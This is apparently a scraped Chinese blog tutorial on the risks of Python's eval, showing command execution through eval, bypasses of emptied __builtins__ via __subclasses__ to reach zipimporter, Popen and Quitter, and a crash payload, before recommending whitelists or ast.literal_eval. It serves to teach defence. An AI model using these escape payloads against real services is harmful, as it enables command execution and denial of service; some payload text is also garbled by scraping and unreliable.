python 爲何說eval要慎用?使用eval 帶來的潛在風險?什麼狀況下使用eval?
eval前言html
In [1]: eval("2+3")
Out[1]: 5
In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]
當內存中的內置模塊含有os的話,eval一樣能夠作到命令執行:python
In [3]: import os
In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0
固然,eval只能執行Python的表達式類型的代碼,不能直接用它進行import操做,但exec能夠。若是非要使用eval進行import,則使用__import__:web
In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0
在實際的代碼中,每每有使用客戶端數據帶入eval中執行的需求。好比動態模塊的引入,舉個栗子,一個在線爬蟲平臺上爬蟲可能有多個而且位於不一樣的模塊中,服務器端但每每只須要調用用戶在客戶端選擇的爬蟲類型,並經過後端的exec或者eval進行動態調用,後端編碼實現很是方便。但若是對用戶的請求處理不恰當,就會形成嚴重的安全漏洞。express
安全」使用evalsegmentfault
如今提倡最多的就是使用eval的後兩個參數來設置函數的白名單:後端
Eval函數的聲明爲eval(expression[, globals[, locals]])安全
其中,第二三個參數分別指定可以在eval中使用的函數等,若是不指定,默認爲globals()和locals()函數中 包含的模塊和函數。服務器
>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
NameError: name 'os' is not defined
若是指定只容許調用abs函數,可使用下面的寫法:函數
>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
File "", line 1, in
File "", line 1, in
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
使用這種方法來防禦,確實能夠起到必定的做用,可是,這種處理方法可能會被繞過,從而形成其餘問題!post
繞過執行代碼1
被繞過的情景以下,小明知道了eval會帶來必定的安全風險,因此使用以下的手段去防止eval執行任意代碼:
env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
eval(users_str, env)
Python中的__builtins__是內置模塊,用來設置內置函數的模塊。好比熟悉的abs,open等內置函數,都是在該模塊中以字典的方式存儲的,下面兩種寫法是等價的:
>>> __builtins__.abs(-20) 20 >>> abs(-20) 20
咱們也能夠自定義內置函數,並像使用Python中的內置函數同樣使用它們:
>>> def hello(): ... print 'shabi' >>> __builtin__.__dict__['say_hello'] = hello >>> say_hello() shabi
小明將eval函數的做用域中的內置模塊設置爲None,好像看起來很完全了,但依然能夠被繞過。__builtins__是__builtin__的一個引用,在__main__模塊下,二者是等價的:
>>> id(__builtins__) 3549136 >>> id(__builtin__) 3549136
根據烏雲drops提到的方法,使用以下代碼便可:
[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")
上面的代碼首先利用__class__和__subclasses__動態加載了object對象,這是由於eval中沒法直接使用object。而後使用object的子類的zipimporter對egg壓縮文件中的configobj模塊進行導入,並調用其內置模塊中的os模塊從而實現命令執行,固然,前提是要有configobj的egg文件。 configobj模塊頗有意思,竟然內置了os模塊:
>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0
和configobj相似的模塊如urllib,urllib2,setuptools等都有os的內置,理論上使用哪一個都行。 若是沒法下載egg壓縮文件,能夠下載帶有setup.py的文件夾,加入:
from setuptools import setup, find_packages
而後執行:
python setup.py bdist_egg
就能夠在dist文件夾中找到對應的egg文件。 繞過demo以下:
>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0
拒絕服務攻擊1
object的子類中有不少有趣的東西,執行如下代碼查看:
[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]
這裏我就不輸出結果了,若是你執行的話,能夠看到不少有趣的模塊,好比file,zipimporter,Quitter等。通過測試,file的構造函數是被解釋器沙箱隔離的。 簡單的,或者直接使object暴露出的子類Quitter進行退出:
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
== 'Quitter'][0](0)()", {'__builtins__':None})
C:/>
若是運氣好,遇到對方程序中導入了os等敏感模塊,那麼Popen就能夠用,而且繞過__builins__爲空的限制,例子以下:
>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
>>>
正在 Ping 127.0.0.1 具備 32 字節的數據:
來自 127.0.0.1 的回覆: 字節=32 時間>>
事實上,這種狀況很是多,好比導入os模塊,通常用來處理路徑問題。因此說,遇到這種狀況,徹底能夠列舉大量的功能函數,來探測目標object的子類中是否含有一些危險的函數能夠直接使用。
拒絕服務攻擊2
一樣,咱們甚至能夠繞過__builtins__爲None,形成一次拒絕服務攻擊,Payload(來自老外blog)以下:
>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})
運行上面的代碼,Python直接crash掉了,形成拒絕服務攻擊。 原理是經過嵌套的lambda來構造一片代碼段,即code對象。爲這個code對象分配空的棧,並給出相應的代碼字符串,這裏是KABOOM,在空棧上執行代碼,會出現crash。構造完成後,調用fc函數便可觸發,其思路不可謂不淫蕩。
總結
從上面的內容咱們能夠看出,單單將內置模塊置爲空,是不夠的,最好的機制是構造白名單,若是以爲比較麻煩,可使用ast.literal_eval代替不安全的eval。
參考資料:
【1】http://nedbatchelder.com/blog...
【2】http://drops.wooyun.org/web/7490
- 1. JavaScript eval() 爲何使用eval()是一個壞主意 何時可使用eval()
- 2. python eval 用法
- 3. python eval( ) 使用詳解
- 4. JavaScript 爲何不推薦使用 eval?
- 5. 前端面試準備1----JS中eval()解析和爲何不要使用eval
- 6. python裏的eval是什麼
- 7. eval詳細說明,局部eval、全局eval和嚴格eval
- 8. eval的使用方法
- 9. eval 的使用與延展
- 10. eval函數使用技巧
- 更多相關文章...
- • 爲什麼使用 XML Schemas? - XML Schema 教程
- • 爲什麼使用 Web Services? - Web Services 教程
- • Composer 安裝與使用
- • 使用Rxjava計算圓周率
-
每一个你不满意的现在,都有一个你没有努力的曾经。